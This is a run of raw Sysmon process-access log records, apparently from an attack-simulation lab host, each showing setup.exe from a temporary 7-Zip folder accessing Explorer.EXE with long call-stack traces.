13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dl